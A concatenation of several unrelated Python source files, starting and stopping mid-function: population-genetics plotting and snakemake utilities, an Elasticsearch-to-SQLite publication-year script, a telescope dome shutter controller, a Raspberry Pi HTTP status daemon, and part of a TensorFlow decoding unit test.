if predictions[i][1] > 0.5:
const_expan+=1
else:
expan_total+=1
expan.append(predictions[i][1])
if predictions[i][0] > 0.5:
expan_const+=1
if predictions[i][1] > 0.5:
expan_expan+=1
np.array(const)
np.array(expan)
ce = round(cross_entropy(predictions,realValues),4)
labels = "Cross entropy = " + str(ce)
data=np.array([[const_const/float(const_total),const_expan/float(const_total)],[expan_const/float(expan_total),expan_expan/float(expan_total)]])
if admixture:
rowLabels = ["No admixture", "Admixture"]
else:
rowLabels = ["Constant", "Growth"]
heatmap = axes[1].pcolor(data, cmap=plt.cm.Blues, vmin=0.0, vmax=1.0)
cbar = plt.colorbar(heatmap, cmap=plt.cm.Blues, ax=axes[1])
cbar.set_label('Proportion assigned to class', rotation=270, labelpad=20)
# put the major ticks at the middle of each cell
axes[1].set_xticks(np.arange(data.shape[1]) + 0.5, minor=False)
axes[1].set_yticks(np.arange(data.shape[0]) + 0.5, minor=False)
axes[1].invert_yaxis()
axes[1].xaxis.tick_top()
plt.tick_params(axis='y', which='both', right='off')
plt.tick_params(axis='x', which='both', direction='out')
if admixture:
axes[1].set_xticklabels(["No admixture", "Admixture"], minor=False, fontsize=6)
else:
axes[1].set_xticklabels(["Constant", "Growth"], minor=False, fontsize=6)
axes[1].set_yticklabels(rowLabels, minor=False, fontsize=6)
for y in range(data.shape[0]):
for x in range(data.shape[1]):
val = data[y, x]
val *= 100
if val > 50:
c = '0.9'
else:
c = 'black'
axes[1].text(x + 0.5, y + 0.5, '%.1f%%' % val, horizontalalignment='center', verticalalignment='center', color=c, fontsize=6)
axes[1].set_title(results["name"]+"\n"+labels,fontsize=6)
fig.subplots_adjust(left=.15, bottom=.05, right=.85, top=0.87, hspace = 0.6, wspace=0.4)
height = 4.00
width = 4.00
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def plotSummaryStats(projectDir_A, projectDir_B, saveas):
## Load all test results
test_info_A = pickle.load(open(os.path.join(projectDir_A, "test", "info.p"), "rb"))
test_info_B = pickle.load(open(os.path.join(projectDir_B, "test", "info.p"), "rb"))
G_A_org, G_A_adv, G_B_org = [],[],[]
for i in range(test_info_A["numReps"]):
Hfilepath = os.path.join(projectDir_A, "test_images", "examp%s_org.npy" %(i))
H = np.load(Hfilepath)
G_A_org.append(H[0])
Hfilepath = os.path.join(projectDir_A, "test_images", "examp%s_adv.npy" %(i))
H = np.load(Hfilepath)
G_A_adv.append(H[0])
Hfilepath = os.path.join(projectDir_B, "test_images", "examp%s_org.npy" %(i))
H = np.load(Hfilepath)
G_B_org.append(H[0])
G_A_org = np.array(G_A_org,dtype="int8")
G_A_adv = np.array(G_A_adv,dtype="int8")
G_B_org = np.array(G_B_org,dtype="int8")
## Calculate stats for projectDir_A original examples
A_org_ng_D, A_org_gr_D = [], []
for i, gm in enumerate(G_A_org):
haps = allel.HaplotypeArray(gm)
gens = allel.GenotypeArray(haps.to_genotypes(ploidy=2))
ac = gens.count_alleles()
D = allel.tajima_d(ac)
if test_info_A["gr"][i] > 0.0:
A_org_gr_D.append(D)
else:
A_org_ng_D.append(D)
print("A_org_ng_D:", np.average(np.array(A_org_ng_D)))
print("A_org_gr_D:", np.average(np.array(A_org_gr_D)))
print("=============================================")
print("=============================================")
## Calculate stats for projectDir_A adversarial examples
A_adv_ng_D, A_adv_gr_D = [], []
for i, gm in enumerate(G_A_adv):
haps = allel.HaplotypeArray(gm)
gens = allel.GenotypeArray(haps.to_genotypes(ploidy=2))
ac = gens.count_alleles()
D = allel.tajima_d(ac)
if test_info_A["gr"][i] > 0.0:
A_adv_gr_D.append(D)
else:
A_adv_ng_D.append(D)
print("A_adv_ng_D:", np.average(np.array(A_adv_ng_D)))
print("A_adv_gr_D:", np.average(np.array(A_adv_gr_D)))
print("=============================================")
print("=============================================")
## Calculate stats for projectDir_B original examples
B_org_ng_D, B_org_gr_D = [], []
for i, gm in enumerate(G_B_org):
haps = allel.HaplotypeArray(gm)
gens = allel.GenotypeArray(haps.to_genotypes(ploidy=2))
ac = gens.count_alleles()
D = allel.tajima_d(ac)
if test_info_B["gr"][i] > 0.0:
B_org_gr_D.append(D)
else:
B_org_ng_D.append(D)
print("B_org_ng_D:", np.average(np.array(B_org_ng_D)))
print("B_org_gr_D:", np.average(np.array(B_org_gr_D)))
print("=============================================")
print("=============================================")
#plt.rc('font', family='serif', serif='Times')
#plt.rc('xtick', labelsize=6)
#plt.rc('ytick', labelsize=6)
#plt.rc('axes', labelsize=6)
#results = pickle.load(open( resultsFile , "rb" ))
#fig,axes = plt.subplots(2,1)
#plt.subplots_adjust(hspace=0.5)
#predictions = results["predictions"]
#realValues = results["Y_test"]
#const, expan = [], []
#const_const, const_expan, expan_const, expan_expan = 0,0,0,0
#const_total, expan_total = 0,0
#for i, val in enumerate(realValues):
# if val[0] == 1.0:
# const_total+=1
# const.append(1.0 - predictions[i][0])
# if predictions[i][0] > 0.5:
# const_const+=1
# if predictions[i][1] > 0.5:
# const_expan+=1
# else:
# expan_total+=1
# expan.append(predictions[i][1])
# if predictions[i][0] > 0.5:
# expan_const+=1
# if predictions[i][1] > 0.5:
# expan_expan+=1
#np.array(const)
#np.array(expan)
#ce = round(cross_entropy(predictions,realValues),4)
#labels = "Cross entropy = " + str(ce)
#data=np.array([[const_const/float(const_total),const_expan/float(const_total)],[expan_const/float(expan_total),expan_expan/float(expan_total)]])
#rowLabels = ["Constant", "Growth"]
#heatmap = axes[0].pcolor(data, cmap=plt.cm.Blues, vmin=0.0, vmax=1.0)
#cbar = plt.colorbar(heatmap, cmap=plt.cm.Blues, ax=axes[0])
#cbar.set_label('Proportion assigned to class', rotation=270, labelpad=20)
## put the major ticks at the middle of each cell
#axes[0].set_xticks(np.arange(data.shape[1]) + 0.5, minor=False)
#axes[0].set_yticks(np.arange(data.shape[0]) + 0.5, minor=False)
#axes[0].invert_yaxis()
#axes[0].xaxis.tick_top()
#plt.tick_params(axis='y', which='both', right='off')
#plt.tick_params(axis='x', which='both', direction='out')
#axes[0].set_xticklabels(["Constant", "Growth"], minor=False, fontsize=6)
#axes[0].set_yticklabels(rowLabels, minor=False, fontsize=6)
#for y in range(data.shape[0]):
# for x in range(data.shape[1]):
# val = data[y, x]
# val *= 100
# if val > 50:
# c = '0.9'
# else:
# c = 'black'
# axes[0].text(x + 0.5, y + 0.5, '%.1f%%' % val, horizontalalignment='center', verticalalignment='center', color=c, fontsize=6)
#axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
#results = pickle.load(open(resultsFile2 , "rb"))
#predictions = results["predictions"]
#realValues = results["Y_test"]
#const, expan = [], []
#const_const, const_expan, expan_const, expan_expan = 0,0,0,0
#const_total, expan_total = 0,0
#for i, val in enumerate(realValues):
# if val[0] == 1.0:
# const_total+=1
# const.append(1.0 - predictions[i][0])
# if predictions[i][0] > 0.5:
# const_const+=1
# if predictions[i][1] > 0.5:
# const_expan+=1
# else:
# expan_total+=1
# expan.append(predictions[i][1])
# if predictions[i][0] > 0.5:
# expan_const+=1
# if predictions[i][1] > 0.5:
# expan_expan+=1
#np.array(const)
#np.array(expan)
#ce = round(cross_entropy(predictions,realValues),4)
#labels = "Cross entropy = " + str(ce)
#data=np.array([[const_const/float(const_total),const_expan/float(const_total)],[expan_const/float(expan_total),expan_expan/float(expan_total)]])
#rowLabels = ["Constant", "Growth"]
#heatmap = axes[1].pcolor(data, cmap=plt.cm.Blues, vmin=0.0, vmax=1.0)
#cbar = plt.colorbar(heatmap, cmap=plt.cm.Blues, ax=axes[1])
#cbar.set_label('Proportion assigned to class', rotation=270, labelpad=20)
## put the major ticks at the middle of each cell
#axes[1].set_xticks(np.arange(data.shape[1]) + 0.5, minor=False)
#axes[1].set_yticks(np.arange(data.shape[0]) + 0.5, minor=False)
#axes[1].invert_yaxis()
#axes[1].xaxis.tick_top()
#plt.tick_params(axis='y', which='both', right='off')
#plt.tick_params(axis='x', which='both', direction='out')
#axes[1].set_xticklabels(["Constant", "Growth"], minor=False, fontsize=6)
#axes[1].set_yticklabels(rowLabels, minor=False, fontsize=6)
#for y in range(data.shape[0]):
# for x in range(data.shape[1]):
# val = data[y, x]
# val *= 100
# if val > 50:
# c = '0.9'
# else:
# c = 'black'
# axes[1].text(x + 0.5, y + 0.5, '%.1f%%' % val, horizontalalignment='center', verticalalignment='center', color=c, fontsize=6)
#axes[1].set_title(results["name"]+"\n"+labels,fontsize=6)
#fig.subplots_adjust(left=.15, bottom=.05, right=.85, top=0.87, hspace = 0.6, wspace=0.4)
#height = 4.00
#width = 4.00
#fig.set_size_inches(height, width)
#fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def getMeanSDMax(trainDir):
'''
get the mean and standard deviation of rho from training set
str -> int,int,int
'''
info = pickle.load(open(trainDir+"/info.p","rb"))
rho = info["rho"]
segSites = info["segSites"]
tar_mean = np.mean(rho,axis=0)
tar_sd = np.std(rho,axis=0)
return tar_mean,tar_sd,max(segSites)
#-------------------------------------------------------------------------------------------
def unNormalize(mean,sd,data):
'''
un-zcore-ify. do the inverse to get real value predictions
float,float,float[] -> float[]
'''
data *= sd
data += mean ##comment this line out for GRU_TUNED84_RELU
return data
#-------------------------------------------------------------------------------------------
def plotParametricBootstrap(results,saveas):
'''
Use the location of "out" paramerter to parametric bootstrap
as input to plot the results of said para-boot
'''
stats = pickle.load(open(results,'rb'))
x = stats["rho"]
fig, ax = plt.subplots()
for i,s in enumerate(stats):
if(i == 0):
continue
ax.plot(x,stats[s])
lims = [
np.min([ax.get_xlim(), ax.get_ylim()]), # min of both axes
np.max([ax.get_xlim(), ax.get_ylim()]), # max of both axes
]
ax.set_xlim(lims)
ax.set_ylim(lims)
ax.plot(lims, lims, 'k-', alpha=0.75, zorder=0)
fig.savefig(saveas)
return None
#-------------------------------------------------------------------------------------------
def snakemake_stitch_info(projectDir, seed=None, reps=None):
'''
combine the info files
created using snakemake into a directory structure
that looks as if it was created using the standard
iai-simulate pipeline
'''
## Make directories if they do not exist
trainDir = os.path.join(projectDir,"train")
valiDir = os.path.join(projectDir,"vali")
testDir = os.path.join(projectDir,"test")
networkDir = os.path.join(projectDir,"networks")
## Might need to add some info keys if using grid params?
info_keys = ["rho","mu","m","segSites","seed","gr","ne"]
## Combine the `info.p` files
minSegSites = float("inf")
for i,new_dir in enumerate([trainDir,valiDir,testDir]):
if not os.path.exists(new_dir):
os.makedirs(new_dir)
new_info_file = {}
for j in range(reps):
trainRep = os.path.join(projectDir,"rep{}".format(j+1),"train")
valiRep = os.path.join(projectDir,"rep{}".format(j+1),"vali")
testRep = os.path.join(projectDir,"rep{}".format(j+1),"test")
networkRep = os.path.join(projectDir,"rep{}".format(j+1),"networks")
rep_dirs = [trainRep,valiRep,testRep]
info_file = pickle.load(open(os.path.join(rep_dirs[i],"info.p"),"rb"))
try:
new_info_file["numReps"] += info_file["numReps"]
for key in info_keys:
new_array = np.concatenate((new_info_file[key], info_file[key]), axis=None)
new_info_file[key] = new_array
except KeyError:
new_info_file = info_file
S_min = min(new_info_file["segSites"])
minSegSites = min(minSegSites, S_min)
pickle.dump(new_info_file, open(os.path.join(new_dir, "info.p"), "wb"))
## Add the `simPars.p` file
if not os.path.exists(networkDir):
os.makedirs(networkDir)
simPars = pickle.load(open(os.path.join(networkRep,"simPars.p"),"rb"))
simPars["seed"] = seed
if os.path.basename(projectDir):
simPars["bn"] = os.path.basename(projectDir)
else:
simPars["bn"] = projectDir.split("/")[-2]
simPars["minSegSites"] = minSegSites
pickle.dump(simPars, open(os.path.join(networkDir,"simPars.p"),"wb"))
return None
#-------------------------------------------------------------------------------------------
def snakemake_stitch_sims(projectDir, rep_dir, idx, nTrain, nVali, nTest, trim=False):
'''
combine the simulation files
created using snakemake into a directory structure
that looks as if it was created using the standard
iai-simulate pipeline
'''
## Move and rename the simulation files
trainDir = os.path.join(projectDir,"train")
valiDir = os.path.join(projectDir,"vali")
testDir = os.path.join(projectDir,"test")
networkDir = os.path.join(projectDir,"networks")
minSegSites = pickle.load(open(os.path.join(networkDir,"simPars.p"),"rb"))["minSegSites"]
sims_per_rep = [nTrain, nVali, nTest]
for i,new_dir in enumerate([trainDir,valiDir,testDir]):
if trim:
print("\nTrimming genotype and position .npy files in %s to %s SNPs"%(new_dir,minSegSites))
new_index = (int(idx)-1) * sims_per_rep[i]
trainRep = os.path.join(rep_dir,"train")
valiRep = os.path.join(rep_dir,"vali")
testRep = os.path.join(rep_dir,"test")
rep_dirs = [trainRep,valiRep,testRep]
for j in range(sims_per_rep[i]):
H_orig_file = os.path.join(rep_dirs[i], "{}_haps.npy".format(j))
P_orig_file = os.path.join(rep_dirs[i], "{}_pos.npy".format(j))
H_new_file = os.path.join(new_dir, "{}_haps.npy".format(new_index))
P_new_file = os.path.join(new_dir, "{}_pos.npy".format(new_index))
H = np.load(H_orig_file)
P = np.load(P_orig_file)
if trim:
H = H[:minSegSites]
P = P[:minSegSites]
np.save(H_new_file,H)
np.save(P_new_file,P)
new_index += 1
done_file = os.path.join(rep_dir,"done.txt")
with open(done_file, "w") as fIN:
fIN.write("done")
# for storage efficiency, remove files only after trim is complete
for i,new_dir in enumerate([trainDir,valiDir,testDir]):
trainRep = os.path.join(rep_dir,"train")
valiRep = os.path.join(rep_dir,"vali")
testRep = os.path.join(rep_dir,"test")
rep_dirs = [trainRep,valiRep,testRep]
for j in range(sims_per_rep[i]):
H_orig_file = os.path.join(rep_dirs[i], "{}_haps.npy".format(j))
P_orig_file = os.path.join(rep_dirs[i], "{}_pos.npy".format(j))
os.remove(H_orig_file)
os.remove(P_orig_file)
return None
#-------------------------------------------------------------------------------------------
def snakemake_remove_rep_dirs(projectDir, reps):
'''
remove all the replicate directory structure
'''
for j in range(reps):
rep_dir = os.path.join(projectDir,"rep{}".format(j+1))
shutil.rmtree(rep_dir)
done_file = os.path.join(projectDir,"done.txt")
with open(done_file, "w") as fIN:
fIN.write("done")
print("Snakefile done")
return None
#-------------------------------------------------------------------------------------------
def worker_downsample(task_q, result_q, params):
while True:
try:
mpID, nth_job = task_q.get()
subsample_indices, minSites, from_dir, to_dir = params
for i in mpID:
for extension in ["_haps.npy","_pos.npy"]:
orig_file = os.path.join(from_dir, "{}{}".format(subsample_indices[i],extension))
new_file = os.path.join(to_dir, "{}{}".format(i,extension))
H = np.load(orig_file)
H = H[:minSites]
np.save(new_file,H)
finally:
task_q.task_done()
|
add_pub_year.py
|
#########################################################################################################################################
# IMPORTS ###############################################################################################################################
from elasticsearch import Elasticsearch as ES
import sqlite3
import re
import sys
import time
from collections import Counter
import multiprocessing as MP
from copy import deepcopy as copy
#########################################################################################################################################
# GLOBAL OBJECTS ########################################################################################################################
mapping = sys.argv[1];
DBs_in = 'representations/'+mapping+'/representations/'+'bielefeld'+'/';
DBs_out = 'representations/'+mapping+'/representations/'+'bielefeld_year'+'/';
gate = 'svkowos.gesis.intra';
addr_index = 'wos';
addr_body = { "query": {"term":{"_id": None}}, "_source":["pub_info"] };
_workers_ = 16;
_scrollsize_ = 100;
#########################################################################################################################################
# FUNCTIONS #############################################################################################################################
def get_year(wos_id,client):
body = copy(addr_body);
body['query']['term']['_id'] = wos_id;
result = client.search(index=addr_index,body=body);
years = [doc['_source']['pub_info']['pubyear'] if 'pub_info' in doc['_source'] and 'pubyear' in doc['_source']['pub_info'] else None for doc in result['hits']['hits']];
if len(years) != 1:
print('WARNING: There are',len(years),'results for',wos_id,'. Skipping...');
return None;
return years[0];
#########################################################################################################################################
# PREPARING #############################################################################################################################
_cons_in_ = [sqlite3.connect(DBs_in+str(x)+'.db') for x in range(_workers_)];
_curs_in_ = [con_in.cursor() for con_in in _cons_in_];
_cons_out_ = [sqlite3.connect(DBs_out+str(x)+'.db') for x in range(_workers_)];
_curs_out_ = [con_out.cursor() for con_out in _cons_out_];
for cur_out in _curs_out_:
cur_out.execute("DROP TABLE IF EXISTS representations");
cur_out.execute("CREATE TABLE representations(mentionID TEXT, wos_id TEXT, id INT, string TEXT, c1 TEXT, t1 TEXT, c2 TEXT, t2 TEXT, c3 TEXT, t3 TEXT, c4 TEXT, t4 TEXT, street TEXT, number TEXT, postcode TEXT, city TEXT, country TEXT, concomp INT)");
_clients = [ES([gate],scheme='http',port=9200,timeout=60) for x in range(_workers_)];
#########################################################################################################################################
# LOADING ADDRESSES #####################################################################################################################
def work(cur_out,con_out,cur_in,client):
cur_in.execute("SELECT * FROM representations");
while True:
rows = cur_in.fetchmany(_scrollsize_);
if len(rows) == 0:
break;
rows_new = [];
for mentionID, wos_id, bfd_id, string, c1, t1, c2, t2, c3, t3, c4, t4, street, number, postcode, city, country, concomp in rows:
number = get_year(wos_id,client);
rows_new.append((mentionID,wos_id,bfd_id,string,c1,t1,c2,t2,c3,t3,c4,t4,street,number,postcode,city,country,concomp,));
cur_out.executemany("INSERT INTO representations VALUES("+','.join(['?' for x in range(18)])+")",rows_new);
con_out.commit();
def main():
workers = [MP.Process(target=work, args=(_curs_out_[x],_cons_out_[x],_curs_in_[x],_clients[x],)) for x in range(_workers_)];
for worker in workers: worker.start();
for worker in workers: worker.join();
print('Done with adding additional information.');
try:
main()
except KeyboardInterrupt:
print('Interrupted.');
#########################################################################################################################################
|
musca.py
|
import time
from contextlib import suppress
from threading import Thread, Lock
from astropy import units as u
from panoptes.utils import error
from panoptes.utils.time import CountdownTimer
from panoptes.utils.utils import get_quantity_value
from panoptes.pocs.dome.abstract_serial_dome import AbstractSerialDome
class Protocol:
# device names
SHUTTER = 'Shutter'
DOOR = 'Door'
BATTERY = 'Battery'
SOLAR_ARRAY = 'Solar_A'
SWITCH = 'Switch'
# Valid thing to query about status
VALID_DEVICE = (SHUTTER, DOOR, BATTERY, SOLAR_ARRAY, SWITCH)
# Commands to write/send to shutter
OPEN_DOME = 'Shutter_open'
CLOSE_DOME = 'Shutter_close'
KEEP_DOME_OPEN = 'Keep_dome_open'
GET_STATUS = 'Status_update'
GET_PARAMETER = 'Get_parameters'
# Status codes produced by Shutter
CLOSED = 'Closed'
OPEN = 'Open'
OPENING = 'Opening'
CLOSING = 'Closing'
PARTIALLY_OPEN = 'PartOpen'
ILLEGAL = 'Illegal'
# Status codes produced by the dome when not responding to a movement cmd.
STABLE_STATES = (CLOSED, OPEN, PARTIALLY_OPEN)
# Status codes produced by Door
DOOR_OPEN = 'Open'
DOOR_CLOSED = 'Closed'
# Types for status values
STATUS_TYPES = {'Battery': float,
"Solar_A": float}
class HuntsmanDome(AbstractSerialDome):
"""Class for musca serial shutter control plus sending updated commands to TSX.
Musca Port setting: 9600/8/N/1
The default behaviour of the Musca is to asynchronously send status updates when something
(e.g. battery voltage) changes. A full status update can be requested by sending the appropriate
command to the musca. However, it appears that musca will not send status updates while the
shutter is moving, but sends a full status update after it stops moving.
"""
LISTEN_TIMEOUT = 3 # Max number of seconds to wait for a response.
MOVE_LISTEN_TIMEOUT = 0.1 # When moving, how long to wait for feedback.
NUM_CLOSE_FEEDBACKS = 2 # Number of target_feedback bytes needed.
# s, A status_update is requested every minute to monitor connectivity.
STATUS_UPDATE_FREQUENCY = 60.
# V, so we don't open if less than this or CLose immediately if we go less than this
MIN_OPERATING_VOLTAGE = 12.
def __init__(self, command_delay=1, max_status_attempts=10, shutter_timeout=100, sleep=60,
*args, **kwargs):
"""
Args:
command_delay (float, optional): Wait this long in seconds before allowing next command
due to slow musca CPU. Default 1s.
max_status_attempts (int, optional): If status fails, retry this many times before
raising a PanError. Default: 10.
shutter_timeout (u.Quantity, optional): The dome shutter movement timeout. Default 80s.
sleep (u.Quantity, optional): Time to sleep between dome loop iterations.
Default is 1 min.
"""
super().__init__(*args, **kwargs)
self._command_lock = Lock() # Use a lock to make class thread-safe
self.serial.ser.timeout = HuntsmanDome.LISTEN_TIMEOUT
self._command_delay = get_quantity_value(command_delay, u.second)
self._shutter_timeout = get_quantity_value(shutter_timeout, u.second)
self._max_status_attempts = int(max_status_attempts)
self._sleep = get_quantity_value(sleep, u.second)
self._status = {}
self._status_updated = {d: False for d in Protocol.VALID_DEVICE}
self._keep_open = None
self._stop_dome_thread = False
self._stop_status_thread = False
self._status_thread = Thread(target=self._async_status_loop)
self._dome_thread = Thread(target=self._async_dome_loop)
# Start the status thread running and wait until we have a complete status reading
self._status_thread.start()
self._wait_for_status()
# Start the main dome control loop
self._dome_thread.start()
def __del__(self):
self._stop_dome_thread = True
self.close()
self._dome_thread.join()
self._stop_status_thread = True
self._status_thread.join()
@property
def is_open(self):
v = self.status[Protocol.SHUTTER]
return v == Protocol.OPEN
@property
def is_closed(self):
v = self.status[Protocol.SHUTTER]
return v == Protocol.CLOSED
@property
def door_open(self):
v = self.status[Protocol.DOOR]
return v == Protocol.DOOR_OPEN
@property
def door_closed(self):
v = self.status[Protocol.DOOR]
return v == Protocol.DOOR_CLOSED
@property
def is_safe_to_open(self):
v = self.status[Protocol.BATTERY]
if v < self.MIN_OPERATING_VOLTAGE:
self.logger.debug(f'Dome shutter battery voltage too low to open: {v!r}')
return False
return True
@property
def status(self):
"""A dictionary containing all status info for dome. """
return self._status
def open(self):
"""Open the shutter using musca.
Returns:
bool: True if Opened, False if it did not Open.
"""
if self.is_open:
return True
if not self.is_safe_to_open:
raise error.PanError("Tried to open the dome shutter while not safe.")
self.logger.info("Opening dome shutter.")
self._write_musca(Protocol.OPEN_DOME)
# Wait for the shutter to actually open
self._wait_for_true("is_open")
if not self.is_open:
raise error.PanError("Attempted to open the dome shutter but got wrong status:"
f" {self.status[Protocol.SHUTTER]}")
self._keep_open = True
def close(self):
"""Close the shutter using musca.
Returns:
bool: True if Closed, False if it did not Close.
"""
self._keep_open = False
if self.is_closed:
return True
self.logger.info("Closing dome shutter.")
self._write_musca(Protocol.CLOSE_DOME)
# Wait for the it to actually close
self._wait_for_true("is_closed")
if not self.is_closed:
raise error.PanError("Attempted to close the dome shutter but got wrong status:"
f" {self.status[Protocol.SHUTTER]}")
# Private Methods
def _async_dome_loop(self):
""" Repeatedly check status and keep dome open if necessary. """
self.logger.debug("Starting dome loop.")
while True:
# Check if the thread should terminate
if self._stop_dome_thread:
self.logger.debug("Stopping dome loop.")
return
# Log the dome status
self.logger.debug(f"Dome status: {self.status}.")
# If thread has just started, maintain current dome state
if self._keep_open is None:
if self.is_open:
self.logger.info("Dome shutter is already open, keeping it that way for now.")
self._keep_open = True
else:
self._keep_open = False
# Check if we need to keep the dome open
if self._keep_open:
self.logger.debug("Keeping dome open.")
self._write_musca(Protocol.KEEP_DOME_OPEN)
time.sleep(self._sleep)
def _async_status_loop(self):
""" Continually read status updates from Musca. """
# Tell musca to send the full status
self._write_musca(Protocol.GET_STATUS)
self.logger.debug("Starting status loop.")
while True:
# Check if the thread should terminate
if self._stop_status_thread:
self.logger.debug("Stopping status loop.")
return
self._status["dome_loop_running"] = self._dome_thread.is_alive()
self._status["status_loop_running"] = self._status_thread.is_alive()
self._status["keep_shutter_open"] = self._keep_open
raw_response = self.serial.read(retry_limit=1, retry_delay=0.1)
if not raw_response:
continue
response = [s.strip() for s in raw_response.split(":")]
if len(response) != 2:
continue
key, value = response
with suppress(KeyError):
value = Protocol.STATUS_TYPES[key](value)
if key in Protocol.VALID_DEVICE:
self._status[key] = value
self._status_updated[key] = True
def _write_musca(self, cmd):
"""Wait for the command lock then write command to serial bluetooth device musca."""
with self._command_lock:
self.serial.reset_input_buffer()
self.serial.write(f'{cmd}\n')
time.sleep(self._command_delay)
def _wait_for_status(self, timeout=60, sleep=0.1):
""" Wait for a complete status.
Args:
timeout (float, optional): The timeout in seconds. Default 60.
sleep (float, optional): Time to sleep between checks in seconds. Default 0.1.
"""
timer = CountdownTimer(duration=timeout)
while not timer.expired():
if all(self._status_updated.values()):
return
time.sleep(sleep)
raise error.Timeout("Timeout while waiting for dome shutter status.")
def _wait_for_true(self, property_name, sleep=1):
""" Wait for a property to evaluate to True. """
timer = CountdownTimer(self._shutter_timeout)
while not timer.expired():
if getattr(self, property_name):
return
time.sleep(sleep)
raise error.Timeout(f"Timeout while waiting for dome shutter property: {property_name}.")
|
daemonhttp.py
|
#
# Imports
#
import configparser
import json
import logging
import raspberrypi
import threading
import time
import signal
from http.server import HTTPServer, SimpleHTTPRequestHandler
from http import HTTPStatus
from urllib.parse import urlparse, parse_qs
class Config:
def __init__(self, filename, default={}):
self.filename = filename
self.default = default
self.config = configparser.ConfigParser()
def load(self):
self.config.read(self.filename)
if 'DEFAULT' not in self.config:
self.config['DEFAULT'] = {}
def save(self):
with open(self.filename, 'w') as configfile:
self.config.write(configfile)
def getint(self, key):
if self.config.has_option('DEFAULT', key):
return self.config.getint('DEFAULT', key)
else:
return int(self.default[key])
def getboolean(self, key):
if self.config.has_option('DEFAULT', key):
return self.config.getboolean('DEFAULT', key)
else:
return self.default[key].lower() in ['true', '1', 't', 'y', 'yes', 'on']
def __getitem__(self, key):
if key in self.config['DEFAULT']:
return self.config['DEFAULT'][key]
else:
return self.default[key]
def __setitem__(self, key, value):
self.config['DEFAULT'][key] = str(value)
class DaemonHTTPHandler(SimpleHTTPRequestHandler):
def do_GET(self):
if DaemonHTTPHandler._is_resource_access(self.path):
SimpleHTTPRequestHandler.do_GET(self)
elif DaemonHTTPHandler._is_api_request(self.path):
self._handle_api()
else:
logging.error("Invalid resource access %s", self.path)
self.send_error(404, "Resource not found")
def log_message(self, format, *args):
logging.info("%s %s", self.address_string(), format % args)
def log_error(self, format, *args):
logging.error("%s %s", self.address_string(), format % args)
def translate_path(self, path):
if path.startswith('/resources'):
return super().translate_path(path)
else:
return super().translate_path("/resources" + path)
def _handle_api(self):
# Parse URL
parsed_url = urlparse(self.path)
api = parsed_url.path[len("/api/"):].lower()
query_params = parse_qs(parsed_url.query)
# Retrieve API Data
data = self.server.daemon.handle_api(api, query_params, None)
# If API data is valid then send it
if data:
encoded_data = bytes(data, "UTF-8")
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", "application/json")
self.send_header("Content-Length", len(encoded_data))
self.end_headers()
self.wfile.write(encoded_data)
else:
logging.error("Invalid API call. API: %s", api)
self.send_error(500, "Not implemented")
@staticmethod
def _is_api_request(path: str) -> bool:
if path.startswith("/api") and len(path) > len("/api/"):
return True
else:
return False
@staticmethod
def _is_resource_access(path: str) -> bool:
if path.startswith("/resources"):
return True
if path == "/index.html" or path == "/":
return True
return False
class Daemon:
def __init__(self, config: Config) -> None:
self.config = config
self.config.load()
self.recalc_interval = float(self.config['recalc_interval'])
self.http_server = HTTPServer(('', self.config.getint('server_port')), DaemonHTTPHandler)
self.http_server.daemon = self
self.http_server_thread = threading.Thread(target=self.http_server.serve_forever)
self.running = False
def handle_api(self, api, query, post) -> str:
logging.info("API Request handling. API:%s QUERY:%s POST:%s", api, query, post)
param = {}
if query:
param.update(query)
if post:
param.update(post)
result = self.api(api, param)
return json.dumps(result)
def api(self, api, params):
result = {}
if api == "hardware":
result['temperature'] = raspberrypi.get_temperature()
result['voltage'] = raspberrypi.get_voltage()
result['frequency'] = raspberrypi.get_frequency()
result['memory'] = raspberrypi.get_totalmemory()
result['free'] = raspberrypi.get_freememory()
result['uptime'] = raspberrypi.get_uptime()
result['loadavg'] = raspberrypi.get_loadavg()
else:
return None
return result
def run(self):
self.running = True
signal.signal(signal.SIGINT, self._stop_loop)
signal.signal(signal.SIGTERM, self._stop_loop)
try:
logging.info("Starting server at %s...", "%s:%s" % self.http_server.server_address)
self.http_server_thread.start()
while self.running:
logging.debug("Recalculating...")
self.recalculate()
logging.debug("... finished recalculating")
time.sleep(self.recalc_interval)
except KeyboardInterrupt:
self.running = False
logging.info("Shutting down server...")
self.http_server.shutdown()
self.http_server_thread.join()
logging.info("bye!")
def recalculate(self):
pass
def _stop_loop(self, signum, frame):
logging.info("Received kill signal")
self.running = False
|
decoding_unit_test.py
|
# Copyright (c) 2020-2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import argparse
import os
import copy
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import sys
import time
sys.path.append("./tensorflow")
from translate_sample import translate_sample
from multiprocessing import Process, Value
class TestDecoding(unittest.TestCase):
common_args_dict = {'batch_size' : 128,
'max_seq_len': 128,
'encoder_head_number': 8,
'encoder_size_per_head': 64,
'decoder_head_number': 8,
'decoder_size_per_head': 64,
'encoder_num_layer': 6,
'decoder_num_layer': 6,
'beam_search_diversity_rate': 0.0,
'sampling_topk': 1,
'sampling_topp': 0.0,
'source_vocabulary': "./tensorflow/utils/translation/wmtende.vocab",
'target_vocabulary': "./tensorflow/utils/translation/wmtende.vocab",
'source': "./tensorflow/utils/translation/test.en",
'target': "./tensorflow/utils/translation/test.de",
"remove_padding": "True"
}
def check_result(self, beam_width, datatype, test_time, topk=4, topp=0.0, batch_size=-1):
result = Value('i', -1)
p = Process(target=self.run_translate, args=(beam_width, datatype, test_time, topk, topp, batch_size, result))
p.start()
p.join()
self.assertTrue(result.value == 1)
def run_translate(self, beam_width, datatype, test_time, topk=4, topp=0.0, batch_size=-1, result=None):
args_dict = copy.deepcopy(self.common_args_dict)
args_dict['beam_width'] = beam_width
args_dict['data_type'] = datatype
args_dict['test_time'] = test_time
args_dict['sampling_topk'] = topk
args_dict['sampling_topp'] = topp
if batch_size != -1:
args_dict['batch_size'] = batch_size
tf.reset_default_graph()
translation_result_list = translate_sample(args_dict)
